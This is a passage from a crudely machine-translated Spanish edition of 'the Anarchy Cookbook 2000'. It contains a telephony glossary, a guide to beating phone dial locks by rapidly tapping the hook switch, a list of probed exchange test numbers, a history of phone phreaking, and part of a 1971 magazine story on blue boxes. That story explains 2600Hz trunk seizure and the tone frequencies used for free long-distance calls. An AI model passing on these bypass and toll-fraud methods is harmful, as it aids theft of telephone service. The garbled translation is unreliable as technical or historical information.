Centrex: un servicio comparable en características a los servicios de PBX, pero con un poco de práctica (Centrex CU) o todos (Centrex CO) del control en la oficina central. En este último caso, el bucle de cada estación se conecta a la oficina central.

Bucle de Cliente: El par de hilos de conexión estación de un cliente a la oficina central.

DDD: Discado Directo a Distancia - Marcación sin asistencia de un operador en la red Intertoll a nivel nacional.

Grupo de enlaces directos: Un grupo de enlaces que es una conexión directa entre un origen determinado y una determinada oficina de terminación.

EOTT: Oficina Fin Trunking Línea - Canalizaciones y entre las oficinas de finales en las diferentes áreas de peaje del centro.

ESB: Oficina de Servicio de Emergencia - Una agencia centralizada a la que 911 "universales" las llamadas de emergencia se dirigen.

ESS: Electronic Switching System - Es un término genérico usado para identificarse como una clase de programa almacenado sistemas de conmutación, tales como N º 1 N º 2 del Sistema de Bell, ½ N º 3, N º 4, o no.

ETS: Sistemas electrónicos de traducción: un sustituto electrónico para el traductor en los sistemas de tarjeta de Crossbar 4A. Emplea el procesador SPC 1A.

Falso inicio: Un intento de marcación abortado.

Rápido Ocupado: (a menudo llamado reordenar) - Una señal audible ocupado interrumpió al doble de la velocidad de la señal de ocupado normal; enviado a la estación de origen para indicar que la llamada bloqueada debido al equipo ocupado.

Page 195: 106652012 the Anarchy Cookbook 2000 Es

Grupo de líneas externas final: El grupo de enlaces a los que se enrutan las llamadas cuando esté disponible de alto uso de desbordamiento de los troncos, en general, estos grupos "casa" en una oficina más próxima en la jerarquía.

Grupo completo: un grupo de enlaces que no permite desviar el tráfico fuera de contingente de extranjeros, hay siete oficinas de este tipo.

Deslumbramiento: La situación que se produce cuando un tronco de dos vías se incautaron de más o menos simultáneamente en ambos extremos.

Grupo de alto tronco de uso: La denominación de un grupo de enlaces que tiene rutas alternativas a través de otros grupos similares, y finalmente a través de un grupo de enlaces final a una oficina de rango superior.

Intercepción: La agencia (por lo general un operador) a la que se enrutan las llamadas cuando se hace a una línea acaba de sacar de un servicio, o en alguna otra categoría que requiere una explicación. Versiones automáticas (ASI) con unidades automáticas de respuesta de voz son cada vez más en uso.

Interrumpir: La interrupción en una línea telefónica para desconectar y conectar con otra estación, como por ejemplo una interrupción emergencia.

Juntor: Un cable de conexión o circuito de las redes en la misma oficina. El equivalente funcional de un tronco intraoffice.

MF: multifrecuencia - El método de señalización a través de un tronco haciendo uso de la aplicación simultánea de dos de los seis posibles frecuencias.

ANP: Área del Plan de Numeración.

ONI: Número de identificación del operador - El uso de un operador en una oficina CAMA para obtener verbalmente el número de llamada de una llamada procedente de una oficina no está equipado con ANI.

PBX: Private Branch Exchange - (PABX: centralita automática privada) Un teléfono de la oficina atiende a un cliente privado, lo general, el acceso a la red telefónica externa se proporciona.

Permanente de la señal: Un sostenido descolgado condición sin actividad (sin marcar o zumbido o completado la conexión), tal condición tiende a vincular el equipo, especialmente en los sistemas anteriores. Por lo general accidental, sino que a veces se utiliza intencionadamente por los clientes de alto índice de criminalidad áreas para frustrar a los ladrones.

POTS: Plain Old Telephone Service - servicio básico sin adicionales "bajo coste".

ROTL: Línea remota de prueba de Office - Un medio para probar de forma remota los troncos.

RTA: Acuerdo de maletero a control remoto - Una extensión del sistema que permite que sus TSPS servicios que se prestarán hasta 200 millas desde el sitio de TSP.

SF: sola frecuencia. Un método de señalización para troncales: 2600Hz está impreso en enlaces inactivos.

Supervisar: Para controlar el estado de una llamada.

SxS: (paso a paso o interruptor Strowger) - Un tipo de oficina de la utilización de un interruptor electromecánico de elevación al íntegro movimiento de los pasos como una red de combinación y de control distribuido.

Page 196: 106652012 the Anarchy Cookbook 2000 Es

Talkoff: El fenómeno de la síntesis accidental de una señal de la máquina-inteligible por la voz humana que causa una respuesta inesperada. "Silbando un tono".

Tronco: Un camino entre las oficinas centrales, y en general de 2 hilos de interlocal, de 4 hilos para Intertoll.

TSPS: Servicio de Tráfico del sistema de posición - Un sistema que proporciona, bajo control de programa almacenado, asistencia de un operador eficiente para llamadas de larga distancia. No cambiar el cliente, sino que proporciona una conexión de puente para el operador.

X-barra: (travesaño) - Un tipo de oficina electromecánicos utilizando un "buen movimiento" cambio de coordenadas y una multiplicidad de controles centrales (llamados marcadores).

Hay cuatro variedades:• N º 1 Travesaño: Se utiliza en la oficina de aplicación de gran tamaño

urbano; (1938)• Travesaño No.3: Un pequeño sistema se inició en (1974).• No.4A/4M travesaño: Una máquina de peaje de 4 hilos, (1943).• No Crossbar ½: Una máquina originalmente diseñado para aplicaciones

suburbanas relativamente pequeñas, (1948)

Crossbar Tandem: Una máquina utilizada para la conmutación de la oficina interlocal.

Cerraduras 147.Phone Dial - Cómo vencerás por The Jolly Roger

¿Alguna vez has estado en una oficina o en algún lugar y quería hacer una llamada telefónica gratuita, pero un imbécil poner un candado en el teléfono para evitar que las llamadas salientes? Fret No Phreak más phellow, para cada sistema puede ser golpeado con un poco de conocimiento!

Hay dos maneras de vencer este obstáculo, en primer lugar forzar la cerradura, no tengo el tiempo para enseñar cerrajería, así que vamos con el segundo método que aprovecha las ventajas de la electrónica de teléfono.

Para ser tan simple como sea posible el momento de recoger el teléfono que completar un circuito conocido como bucle local. Al colgar se rompe el circuito. Cuando usted llame al (pulso) también se rompe el circuito, pero no lo suficiente como para colgar! Así que usted puede "Push-dial". Para hacer esto usted >>> <<< RÁPIDAMENTE oprima el gancho conmutador. Por ejemplo, para marcar un operador (y luego darle el número al que desea llamar) >>> RÁPIDAMENTE <<< >>> y UNIFORMEMENTE <<< oprima el gancho conmutador 10 veces. Para marcar 634-1268, presione 6 X pausa, y luego 3 X, pausa, y luego 4X, etc Se necesita un poco de práctica, pero usted conseguirá la caída de ella. Trate de practicar con su propio número para que te den un tono de ocupado, cuando la derecha. También vamos a trabajar al tacto toneÖ ya que una línea DTMF también aceptará el pulso. Además, nunca oprima el gancho conmutador durante más de un segundo o que va a colgar el teléfono!

Por último, recuerde que usted tiene tanto derecho a ese teléfono como el idiota que puso el candado en él!

148.Exchange barrido por la Jolly Roger

Casi todos los intercambios en el sistema de campana tiene la prueba # 's, y otros regalos, tales como los lazos con dial-ups. Estos "extras" se encuentran generalmente entre los 9900 y 9999 en su local de cambios. Si usted tiene el tiempo y la iniciativa, analizar el cambio y que puede llegar a ser afortunado!

Éstos son algunos de los hallazgos en el intercambio 914-268:

Page 197: 106652012 the Anarchy Cookbook 2000 Es

9900 - ANI9901 - ANI9927 - OSC. TONO (tono lateral POSIBLE DE UN LOOP)9936 - # VOZ A LA OFICINA CENTRAL DE TELCO9937 - # VOZ A LA OFICINA CENTRAL DE TELCO9941 - ORDENADOR (TRANSMISIÓN DIGITAL DE VOZ?)9960 - OSC. TONO (LOOP SIDE TONE) también puede ser UNA COMPUTADORA EN ALGUNOS CAMBIOS9961 - RESPUESTA (EL OTRO EXTREMO DE LOOP?)9962 - RESPUESTA (EL OTRO EXTREMO DE LOOP?)9963 - RESPUESTA (EL OTRO EXTREMO DE LOOP?)9966 - Equipo (ver 9941)9968 - TONO QUE DESAPARECE - responde a algunas de marcación por tonos CLAVES

La mayoría de los números entre 9900 y 9999 sonará o ir a un "¿qué #, por favor?" operador.

Historia breve de 149.A Phreaking por la Jolly Roger

Bueno, ahora sabemos un poco de vocabulario, y ahora en la historia de su Phreak la historia,. De vuelta en el MIT en 1964 llegó a un estudiante con el nombre de Stewart Nelson, que estaba extremadamente interesado en el teléfono. Antes de entrar en el MIT, que él había construido marcadores automáticos, cajas de queso, y muchos aparatos más. Pero cuando llegó al MIT se convirtió en aún más interesados en "fone-piratería" como ellos lo llamaban. Después de un rato, naturalmente, comenzó a utilizar el PDP-1, el equipo de las escuelas en ese momento, y desde allí se decidió que sería interesante ver si el equipo puede generar las frecuencias necesarias para el azul del boxeo. Los hackers del MIT no estaban interesados en estafando a Ma Bell, pero sólo para explorar la red telefónica. Stew (como se le llamaba), escribió un programa para generar todos los tonos y se adentró en la gran red.

Ahora había más gente que los phreaking en el MIT. La mayoría de la gente ha oído hablar de Captain Crunch (No, no la de cereales), también descubrió la manera de realizar paseos a través del sistema fone, con la ayuda de un pequeño silbato encontrado en una caja de cereales (podemos adivinar cuál?). Al soplar el silbato, que ha generado el 2600Hz mágico y en la boquilla que navegaba, dándole un control completo sobre el sistema. He oído rumores de que a la vez que hizo sobre la cuarta parte de las llamadas que salen de San Francisco. Se levantó rápidamente famoso. Él apareció en la portada de la revista People y fue entrevistado varias veces (como se verá pronto). Bueno, finalmente fue atrapado después de una carrera de aventura de largo. Después de que él fue capturado fue puesto en la cárcel y le dieron una paliza bastante mal porque no quería enseñar a otros presos como a las llamadas de la caja. Después de salir, se unió a Apple Computer y aún está por ahí en alguna parte.

Luego fue Joe el Whistler, forma ciega el día en que nació. Él sabía silbar un tono de 2600Hz perfecto. Se rumoreaba phreaks solían llamarle para ajustar sus cajas.

Bueno, eso fue hasta alrededor de 1970, luego de 1970 a 1979, phreaking se llevó a cabo principalmente por estudiantes universitarios, empresarios y cualquier persona que sabía lo suficiente acerca de la electrónica y de la compañía fono para hacer un Ic 555 para generar los tonos mágicos. Los empresarios y algunos estudiantes universitarios principalmente sólo pocos caja azul para obtener llamadas gratuitas. Los demás seguían allí, explorar s # 800 'y los sistemas ESS nuevos. ESS representa un gran problema para phreaks continuación, e incluso uno más grande ahora. SEE no estaba muy extendida, pero donde estaba, azul boxeo era casi imposible, excepto para el Phreak más experimentado. ESS Hoy está instalado en casi todas las ciudades importantes y azul boxeo está cada vez más difícil.

1978 marcó un cambio en el phreaking, el Apple] [, ahora un equipo que era asequible, puede ser programado, y podría ahorrar todo ese trabajo valioso en un cassette. A continuación, sólo un poco más tarde llegó el módem del gato de Apple. Con este módem, generando todos los tonos de la caja azul fue fácil como escribir un programa para contar formulario de uno a diez (un poco exagerado). Muy pronto los programas que

Page 198: 106652012 the Anarchy Cookbook 2000 Es

podrían imitar a un operador tan bueno como la cosa real estaban golpeando a la comunidad, el PAT y el maullido del gato, son la norma ahora y son los mejores.

1982-1986: los servicios de LD estaban empezando a aparecer en cantidades masivas. La gente ahora tienen programas para hackear los servicios de LD, centrales telefónicas, e incluso contraseñas. A estas alturas muchos phreaks estaban recibiendo muy buena y BBS ha empezado a extenderse por todas partes, cada una con muchas documentaciones sobre phreaking para el principiante. Entonces sucedió, las película Juegos de guerra fue puesto en libertad y el número de masas de sexto grado de todas las edades acudieron a verla. El problema no era que la película era mala, era que ahora todo el mundo quería ser un hacker / Phreak. Los novatos se publicó en el número de masas tales, que los tablones de anuncios comenzó a estar ocupado las 24 horas del día. A día de hoy, todavía no se han recuperado. Otros problemas comenzaron a ocurrir, los principiantes adivinar contraseñas fáciles de usar en las computadoras del gobierno grande y comenzó a jugar a su alrededor ... Bueno, no pasó mucho tiempo antes de que fueran capturados, creo que mucha gente recuerda los 414 de los piratas informáticos. Eran tan estúpido como para decir "sí" cuando el equipo les preguntó si les gustaría jugar. Bueno, al menos que se necesita el calor de los phreaks reales o de hackers o crackers.

150. "Los secretos de la pequeña caja azul", por Ron Rosenbaum

Dudes ... Estos cuatro archivos contienen la historia, "Secretos de la pequeña caja azul".

-Una historia tan increíble que incluso puede hacer que usted se siente mal por la compañía telefónica-

Impreso en octubre 1971 de la revista Esquire. Si usted sucede estar en una biblioteca y venir a través de una colección de revistas Esquire, el 10 1971 trata de la primera edición impresa en el formato más pequeño. La historia comienza en la página 116 con una imagen de una caja azul.

- Un Farad Cap, Gremio del Atlántico anarquista

La caja azul es Introducción: Sus cualidades son comenté yo en la sala de estar amueblada caro de Al Gilbertson (Su verdadero nombre ha sido cambiado.), El creador de la "caja azul". Gilbertson está llevando a cabo una de sus brillantes y negro-plata "cajas azules" cómodamente en la palma de su mano, señalando los trece pequeños botones pulsadores rojos que sobresalen de la consola. Él está bailando con los dedos sobre los botones, tocando a cabo jingles discordantes pitidos electrónicos. Él está tratando de explicar a mí cómo su pequeña caja azul no hace nada menos que la ubicación del sistema de telefonía del mundo, satélites, cables y todo, al servicio del operador de caja azul, de forma gratuita.

"Eso es lo que hace. En esencia, le da el poder de un operador de buena. Usted apoderarse de un tándem con el botón superior", se presiona el botón superior con el dedo índice y el cuadro azul emite un gorjeo de tono alto, "y como que "- barato sale de la caja azul de nuevo -".. que el control de la compañía telefónica de larga distancia los sistemas de conmutación de su teléfono linda pequeños príncipes o cualquier teléfono público de edad y tienes el anonimato operador tiene que operar a partir de una determinada Ubicación:. la compañía de teléfonos sabe dónde está y qué está haciendo, pero con su caja de zumbido, una vez que saltar sobre un tronco, por ejemplo de un Holiday Inn 800 (llamada gratuita) el número, no sé de dónde es usted, o donde vienes, no sé cómo se metió en sus líneas y se metió en ese número de 800. Ellos ni siquiera saben nada ilegal que está pasando. Y usted puede ocultar sus orígenes a través de tantos niveles como se gusta. Usted puede llamar de al lado por medio de White Plains, y luego a Liverpool por cable, y luego de vuelta aquí por satélite. Usted puede llamar desde un teléfono público todo el camino alrededor del mundo para un teléfono público a su lado. Y a conseguir su moneda de diez centavos de vuelta también. "

Page 199: 106652012 the Anarchy Cookbook 2000 Es

"Y no pueden rastrear las llamadas? Ellos no le pueden cobrar?" "No, si lo haces de la manera correcta. Sin embargo, usted encontrará que la cosa libre llamada no es realmente tan emocionante al principio, como la sensación de poder que se obtiene de tener uno de estos bebés en la mano. He visto las personas cuando llegan a apoderarse de una de estas cosas y empezar a usarlo, y descubren que pueden hacer las conexiones, configure y se entrecruzan en zig-zag patrones de conmutación de un lado a otro del mundo. Casi no hablar con la gente que finalmente llega. Ellos dicen hola y empezar a pensar de qué tipo de llamada a hacer a continuación. Ellos van un poco loco. " Él mira hacia abajo en el pequeño paquete en la palma de su mano. Sus dedos se sigue bailando, tocando los patrones zumbador.

"Creo que es algo que ver con lo pequeño que mis modelos son. Hay un montón de cuadros azules alrededor, pero el mío es el más pequeño y por vía electrónica más sofisticada. Me gustaría poder mostrar el prototipo que hicimos para nuestro orden sindicato grande".

Suspira. "Hemos tenido este fin de un millar de cajas de zumbador de un hombre frente a sindicato en Las Vegas. Las utilizan para colocar las apuestas costa a costa, mantener las líneas abiertas por horas, todo lo cual puede resultar caro si tienes que pagar. El acuerdo fue mil cajas azules de 300 dólares cada uno. Antes de eso les vendía por 1.500 dólares cada uno, pero 300.000 dólares en un bulto era difícil de rechazar. Teníamos un acuerdo de fabricación elaborado en Filipinas. Todo listo para funcionar. De todos modos, el modelo que tenía listo para la producción en masa limitada era lo suficientemente pequeño para caber dentro de una caja con tapa superior de Marlboro. Tenía paneles táctiles para lavar un teclado, en lugar de estos botones feos, que sobresale. parecía una radio portátil pequeña. De hecho, yo había diseñado con un receptor de transistor pequeño para conseguir una de la mañana del canal, por lo que en caso de que la ley empezó a sospechar el propietario puede cambiar en la parte de radio, empezar a chasquear los dedos, y nadie podía decir nada ilegal que estaba pasando. Pensé en todo lo que para este modelo -.. lo había forrado con una banda de la termita que pueden ser encendidos por la señal de radio desde un transmisor pequeño botón en su cinturón, por lo que podría ser reducido a cenizas al instante en caso de un busto Era hermoso Una máquina pequeña y hermosa . Usted shouldÆve visto las caras en estos chicos del sindicato cuando volvieron después de haberlo probado. Habían sostenerlo en su mano como nunca quisieron dejarlo ir, y me decían: 'Yo no lo puedo creer. Yo no lo puedo creer. " Es probable que no lo van a creer hasta que lo pruebes ".

La caja azul es probada: algunas relaciones,

Alrededor de las once, dos noches después Fraser Lucey tiene un cuadro azul en la palma de su mano izquierda y un teléfono en la palma de su derecho. Él está de pie dentro de una cabina telefónica al lado de un aislado de apagado motel de la autopista 1. Estoy de pie fuera de la cabina telefónica.

Fraser le gusta hacer alarde de su caja azul para las personas. Hasta hace unas semanas, cuando el Pacífico Teléfono hecho algunos arrestos en su ciudad, Fraser Lucey le gustaba traer a su caja azul (Esta caja azul en particular, como la mayoría de las cajas azules, no es azul. Cajas azules han dado en llamar "cajas azules" ya sea porque: 1) La primera caja azul jamás confiscada por los hombres de seguridad de la empresa telefónica pasó a ser azul, o 2) Para distinguirlas de las "cajas negras". Las cajas negras son los dispositivos, por lo general una resistencia en serie, que, cuando se conecta a teléfonos de la casa, permiten que todas las llamadas entrantes que se hagan sin costo alguno para la propia persona que llama.) A las partes. Nunca ha fallado: Un pibe pocos de su dispositivo y Fraser se convirtió en el centro de atención en más de moda de la misma de las reuniones, haciendo trucos de teléfono y haciendo números de solicitud de horas. Él comenzó a aceptar pedidos de su fabricante en México. Se convirtió en un distribuidor.

Fraser es prudente ahora de donde muestra su caja azul. Pero nunca se cansa de jugar con él. "Es como la primera vez que todo el tiempo", me dice.

Page 200: 106652012 the Anarchy Cookbook 2000 Es

Fraser pone una moneda de diez centavos en la ranura. Se escucha un tono y tiene el receptor a mi oído. Oigo el tono. Fraser comienza describiendo, con un cierto aire practicado, lo que hace mientras lo hace. "Estoy marcando un número 800 ahora. Cualquier número 800 va a hacer. Es gratuito. Esta noche creo que voy a utilizar la ----- (nombra a un conocido alquiler de coche de la empresa) número 800. Mira, está sonando. En este caso, lo oyes? Ahora mira ". Se coloca la caja azul sobre la bocina del teléfono para que la plata y doce botones negros están de frente a mí. Aprieta el botón de plata - el que está en la parte superior - y he oído que un pitido agudo. "Eso es 2600 ciclos por segundo para ser exactos", dice Lucey. "Ahora, rápido. Escucha." Le mete el auricular a mí. El sonido se ha desvanecido. La línea ofrece un hipo leve, hay un zumbido agudo, y luego nada más que ruido blanco suave.

"Ya estamos en casa libre ahora", me dice Lucey, tomando de nuevo el teléfono y la aplicación de la caja azul de su portavoz, una vez más. "Estamos arriba en un tándem, en el tronco de un palangre. Una vez que estás en un tándem, usted puede enviar a cualquier lugar que desee ir." Él decide echa un vistazo a Londres primero. Él elige un teléfono público ubicado en cierta estación de Waterloo. Este teléfono público en particular es muy popular entre la red de telefonía-phreaks, porque por lo general hay gente que pasa por todas las horas en que se recogen y hablar por un rato.

Se aprieta la parte inferior izquierda del botón de esquina, que está marcado como "KP", en la cara de la caja. "Eso es impulso Key. Se dice que el tándem que estamos listos para darle instrucciones. En primer lugar voy a pegarle a START PK 182, que nos va a caer en el remitente en el extranjero en White Plains." Oigo un ruido metálico limpio-pío. "Creo que vamos a ir a Inglaterra por satélite. Por cable es más rápido y la conexión es algo mejor, pero me gusta ir por satélite. Así que sólo perforar PK Cero 44. El cero se supone que garantiza una conexión vía satélite y 44 es el código del país de Inglaterra. Bueno ... estamos allí. En Liverpool realidad. Ahora todo lo que tienes que hacer es perforar el código de área de Londres, que es 1, y marcar el teléfono de pago. Aquí, escucha, tienes un anillo de ahora ".

Oigo el suave ronroneo rápida ronroneo de un anillo de Londres. Entonces, alguien coge el teléfono.

"Hola", dice la voz de Londres.

"Hola. ¿Quién es?" Fraser se pregunta.

"Hola. En realidad hay nadie aquí. Acabo de tomar esto mientras yo pasaba por allí. Se trata de un teléfono público. No hay nadie aquí para responder efectivamente."

"Hola. No cuelgue el teléfono. Estoy llamando desde los Estados Unidos."

"Oh. ¿Cuál es el propósito de la llamada? Se trata de un teléfono público, ya sabes."

"Oh. Ya lo sabes. Para pagar, eh, para saber lo que está pasando en Londres. ¿Cómo es allí?"

"Es de las cinco de la mañana. Está lloviendo ahora."

"Oh. ¿Quién eres tú?"

El transeúnte Londres resulta ser un R.A.F. alistado en su camino de regreso a la base en Lincolnshire, con una terrible resaca después de un pase de treinta y seis horas. Él y hablar Fraser de la lluvia. Están de acuerdo en que es más agradable cuando no está lloviendo. Dicen adiós y Fraser cuelga. Sus declaraciones moneda de diez centavos con un tintineo agradable.

"¿No es tan lejos", dice sonriendo a mí. "Londres, de esa manera."

Fraser aprieta la pequeña caja azul cariñosamente en su mano. "Te dije que esto es de verdad. Escucha, si no te importa voy a probar esta chica que conozco en París. Por lo general darle una llamada alrededor de este tiempo. It monstruos a salir. Esta vez voy

Page 201: 106652012 the Anarchy Cookbook 2000 Es

a utilizar el ------ (otro de alquiler de coche de la empresa) número 800 y vamos a ir por el cable en el extranjero, 133, 33 es el código del país de Francia, el 1 le envía por cable Bueno, aquí estamos. vaya .... Oh, maldita. Ocupado. ¿Quién podía estar hablando en este momento? "

Un coche de policía estatales cruceros lentamente por la carretera. El coche no se detiene, pero Fraser se pone nervioso. Nos saltar de nuevo a su coche y conducir a diez millas en la dirección opuesta hasta llegar a una estación de Texaco encerrado durante la noche. Nos detenemos a una cabina telefónica de la bomba de aire. Guiones de Fraser en el interior y trata de la cantidad de París. Es ocupado de nuevo.

"No entiendo quién podría estar hablando. Los circuitos pueden estar ocupadas. Es una lástima que no han aprendido a aprovechar las líneas en el extranjero con esta cosa todavía."

Fraser comienza a Phreak su alrededor, como los phreakers telefónicos decir. Se marca una tarjeta de carga de todo el país líder en número de 800 y puñetazos a los tonos que le traen el tiempo de grabación en Sydney, Australia. Él emite un sonido hasta la grabación del tiempo en Roma, en italiano, por supuesto. Él llama a un amigo en Boston y habla de un cierto over-the-counter de valores que son en gran medida. Él encuentra el número de París ocupado de nuevo. Se llama "Dial de un disco" en Londres, y escuchamos a dos barriles de David y Collins Ansil, el número uno de éxito de la semana en Londres. Él llama a un distribuidor de otro tipo y las conversaciones en el código. Se llama Joe Engressia, el original ciega teléfono Phreak genio, y paga sus respetos. Hay otras llamadas. Finalmente Fraser consigue a través de su dama joven en París.

Ambos están de acuerdo los circuitos que han estado muy ocupados, y criticar el sistema telefónico de París. A las dos y media de la mañana Fraser cuelga, los bolsillos de su moneda de diez centavos, y se va, dirección con una mano, sosteniendo lo que él llama su "encantadora cajita azul" en la otra.

Usted puede llamar a larga distancia por menos de lo que piensa

"Ya ves, hace unos años la compañía telefónica hace un gran error", explica Gilbertson dos días más tarde en su apartamento. "Ellos eran descuidados como para dejar un poco de revista técnica publicar las frecuencias reales se utilizan para crear todos sus tonos multifrecuencia Sólo un artículo teórico alguna ingeniero de la Bell Telephone Laboratories fue haciendo sobre la teoría de conmutación, y enumeró los tonos de paso A.. - --- (una escuela técnica bien conocida) que había estado jugando con los teléfonos durante varios años antes de que me encontré con un ejemplar de la revista en la biblioteca de ingeniería. Volví corriendo al laboratorio y se tomó quizá doce horas desde el momento Vi que el artículo de armar la primera caja azul de trabajo. Era más grande y más torpe que este pequeño bebé, pero funcionó. "

Es todo lo que hay en los registros públicos en esa revista técnica, escrito principalmente por la gente de Bell Lab para los ingenieros de otro teléfono. O por lo menos era público. "Haga la prueba y obtener una copia de ese tema en alguna biblioteca de ingeniería de la escuela ahora.

Bell ha tenido a todos la etiqueta roja y se retira de la circulación ", me dice Gilbertson.

"Pero es demasiado tarde. Todo es público ahora. Y una vez que se hizo pública la tecnología necesaria para crear un dispositivo de señal acústica propia está dentro del alcance de cualquier niño de doce años de edad, cualquier niño ciego de doce años de edad, como una cuestión de hecho. Y lo puede hacer en menos de las doce horas que nos llevó. los niños ciegos lo hacen todo el tiempo. No se puede construir cualquier cosa, como, precisa y compacta como mi caja de zumbido, pero ellos pueden hacer cualquier cosa puede hacer la mía. "

"¿Cómo?"

Page 202: 106652012 the Anarchy Cookbook 2000 Es

"Está bien. Hace unos veinte años con AT & T. tomó la decisión de miles de millones de dólares para operar la totalidad de su larga distancia sistema de conmutación de doce combinaciones generadas electrónicamente de doce tonos principales. Esos son los tonos que a veces escuchan en el fondo después de que haya marcar un número de larga distancia que decidió utilizar algunos tonos muy simples -.. el tono para cada número está a sólo dos fijos de una sola frecuencia tonos que se reproducen al mismo tiempo para crear una cierta frecuencia de batido igual que 1300 ciclos por segundo y 900 ciclos por segundo jugador juntos dan el tono para el dígito 5 Ahora, lo que algunos de estos teléfonos phreaks han hecho es ponerse a sí mismos el acceso a un órgano eléctrico Cualquier familia barata de entretenimiento en casa de órganos ya que las frecuencias son de conocimiento público ahora -... un phreaker ciego tiene incluso había grabado en uno de los libros hablados para ciegos - que sólo tiene que encontrar las notas musicales en el órgano que corresponden a los tonos del teléfono Luego les graban Por ejemplo, para obtener el tono de Ma Bell para el número 1.. , pulsa las teclas de órganos F ~ 5 y A-5 ~ (900 y 700 ciclos por segundo), al mismo tiempo. Para producir el tono de 2 es f ~ 5 y C ~ 6 (1100 y cps 700). Los phreakers telefónicos circular la lista completa de notas lo que no hay prueba y error nunca más. "

Él me muestra una lista del resto de los números de teléfono y las dos llaves eléctricas de órganos que las producen.

"En realidad, tiene que grabar estas notas a 3 3/4 pulgadas por segundo la velocidad de la cinta y el doble a 7 ½ pulgadas por segundo cuando se reproduzca, para obtener los tonos adecuados", añade.

"Así que una vez que tenga todos los tonos grabados, ¿cómo conectarlos a la central telefónica?"

"Bueno, ellos toman su órgano y su grabadora de cassette, y empezar a golpear los números enteros de teléfono de tonos en el órgano, incluidos los códigos de país, las instrucciones de enrutamiento, 'KP' y 'Start' tonos. O, si no tienen una órgano, alguien en la red de telefonía-Phreak les envía un videocasete con todos los tonos grabados, con una voz que decía: "Número uno", entonces usted tiene el tono, el 'número dos', entonces el tono y así sucesivamente. Así que con dos casetes grabadoras se pueden poner juntas una serie de números de teléfono al cambiar de ida y vuelta desde el número a número. Cualquier idiota en el país con una grabadora de cassette barato pueden hacer todas las llamadas gratis que quiere. "

"¿Quieres decir que acaba de celebrar la grabadora hasta la boquilla y el interruptor en una serie de sonidos que ha grabado? El teléfono piensa que todo lo que hace que estos tonos deben ser su propio equipo?"

"De acuerdo. Mientras se obtiene la frecuencia dentro de los treinta ciclos por segundo de los tonos de la compañía del teléfono, el equipo del teléfono piensa que oye su propia voz hablando con él. El Phreak abuelo teléfono original era este niño ciego con un tono perfecto, Joe Engressia, que se utiliza para silbar en el teléfono. Un operador podría decir la diferencia entre su silbato y el generador de la compañía de teléfonos de tonos electrónicos, pero la conmutación de circuitos de la compañía telefónica no puede distinguirlos. Cuanto más grande es la compañía de teléfonos obtiene y cuanto más lejos de humanos los operadores que obtiene, más vulnerable se hace a todo tipo de phone phreaking ".

Una Guía de los Perplejos

"Pero espere un minuto," me detengo Gilbertson. "Si todo lo que no suena como el equipo del teléfono-empresa, ¿por qué no la compañía de teléfono le cobrará por la llamada de la forma en que cobra su propio equipo?"

"Está bien. Ahí es donde el tono de 2600-el ciclo entra en juego que será mejor empezar desde el principio."

El principio que él describe para mí es una visión del sistema de teléfono del continente en miles de webs, de palangre troncos que irradian de cada uno de los

Page 203: 106652012 the Anarchy Cookbook 2000 Es

cientos de oficinas de peaje de conexión a las oficinas de peaje de conmutación otros. Cada oficina de cambio de número es un hervidero de miles de compactado de larga distancia tándems constantemente silbando y los pitidos de los tándems en lejanas oficinas de peaje de conmutación.

El tándem es la clave para todo el sistema. Cada tándem es una línea con algunos enlaces con la capacidad de señalización de cualquier otro tándem en cualquier oficina de peaje otro cambio en el continente, ya sea directamente de uno a uno o mediante la programación de una ruta indirecta a través de varios otros tándems si todas las rutas directas están ocupados . Por ejemplo, si desea llamar desde Nueva York a Los Angeles y el tráfico es pesado en todos los enlaces directos entre las dos ciudades, su tándem en Nueva York está programado para intentar la siguiente mejor ruta, que puede enviar hasta un tándem en el Nueva Orleans, luego a San Francisco, o hacia abajo para un tandem de Nueva Orleans, de nuevo a un tándem de Atlanta, a un tándem de Albuquerque y, finalmente, hasta Los Ángeles.

Cuando un tandem no se utiliza, cuando se está sentado allí, esperando a alguien para hacer una llamada de larga distancia, silba. Un lado del tándem, el lado "frente a" su teléfono de casa, silba a 2600 ciclos por segundo hacia todos los teléfonos de la casa atendidos por el intercambio, les dice que está a su servicio, en caso de estar interesado en hacer una llamada de larga distancia . El otro lado del tándem se silbido 2600 cps. en una o más líneas troncales de larga distancia, contando el resto del sistema telefónico que no es ni el envío ni la recepción de una llamada a través de ese tronco en el momento, que no tiene ningún uso para el que el tronco en el momento.

"Cuando marca un número de larga distancia lo primero que ocurre es que está enganchado en un tándem. Un registro aparece al lado del tándem de espaldas a usted, y presenta ese lado con el número que usted marcó. Este lado el envío de . del tándem deja de silbar 2600 en su línea troncal Cuando un tándem detiene el tono de 2600 se ha estado enviando a través de un tronco, el tronco se dice que está "tomado", y ahora está listo para llevar el número que ha marcado - se convierten en multi-frecuencia pitidos-a un tándem en el código de área y la oficina central, que quiere.

Ahora bien, cuando un operador de color azul de la caja quiere realizar una llamada desde Nueva Orleans a New York empieza marcando el número 800 de una compañía que podría pasar a tener su sede en Los Ángeles. El envío de parte de la dupla de Nueva Orleans se detiene el envío de 2.600 a lo largo del tronco a la oficina central en Los Ángeles, por lo tanto aprovechar el tronco. Su Nueva Orleans comienza a enviar conjuntamente pitidos de un tándem que ha descubierto brazos cruzados silbar 2600 ciclos en Los Ángeles. El extremo receptor de ese tándem LA resulte aprehendido, deja de silbar 2600, escucha los pitidos que indican qué teléfono para que suene LA, y empieza a sonar el número 800. Mientras tanto, una marca hecha en el New Orleans notas de cinta de la oficina de contabilidad que una llamada desde su teléfono de Nueva Orleans con el número 800 en Los Ángeles se ha iniciado y da a la llamada de un número de código. Todo lo que es habitual hasta ahora.

Pero entonces las prensas phreaker la caja azul a la boquilla y presiona el botón del ciclo 2600, el envío de 2.600 desde el tándem Nueva Orleans para el tándem de Los Ángeles. El tándem LA 2600 da cuenta de los ciclos están llegando a la línea de nuevo y se supone que Nueva Orleans ha colgado porque el tronco está silbando como si está inactivo. El tándem LA inmediatamente deja de tocar el número 800 de Los Angeles. Pero tan pronto como el Phreak toma su dedo del botón de 2600, el tándem LA asume el tronco, una vez más se utiliza debido a que el 2600 se ha ido, por lo que la escucha de una nueva serie de tonos dígitos - para averiguar dónde debe enviar el llamar.

